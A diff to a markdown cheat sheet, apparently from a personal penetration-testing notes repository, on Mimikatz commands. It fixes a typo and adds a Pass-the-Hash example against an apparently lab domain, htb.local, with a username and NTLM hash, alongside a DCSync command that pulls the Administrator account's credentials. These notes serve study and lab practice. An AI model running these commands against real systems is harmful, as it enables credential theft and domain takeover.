amandaguglieri/hackinglife/docs/mimikatz.md

 mimikatz.exe privilege::debug "sekurlsa::pth /user:<username> /rc4:<NTLM hash> /domain:<DOMAIN> /run:<Command>" exit
 # sekurlsa::pth is a module that allows us to perform a Pass the Hash attack by starting a process using the hash of the user's password
 # /run:<Command>: For example /run:cmd.exe
-# 2. After that, we canuse cmd.exe to execute commands in the user's context.
+# 2. After that, we can use cmd.exe to execute commands in the user's context.

+# Example for Pass The Hash attack in windows:
+mimikatz.exe sekurlsa::pth /domain:htb.local /user:jackie.may /rc4:ad11e823e1638def97afa7cb08156a94 /run:cmd.exe

 # Run a dcsync attack:
 .\mimikatz.exe privilege::debug "lsadump::dcsync /domain:$domain /user:Administrator" exit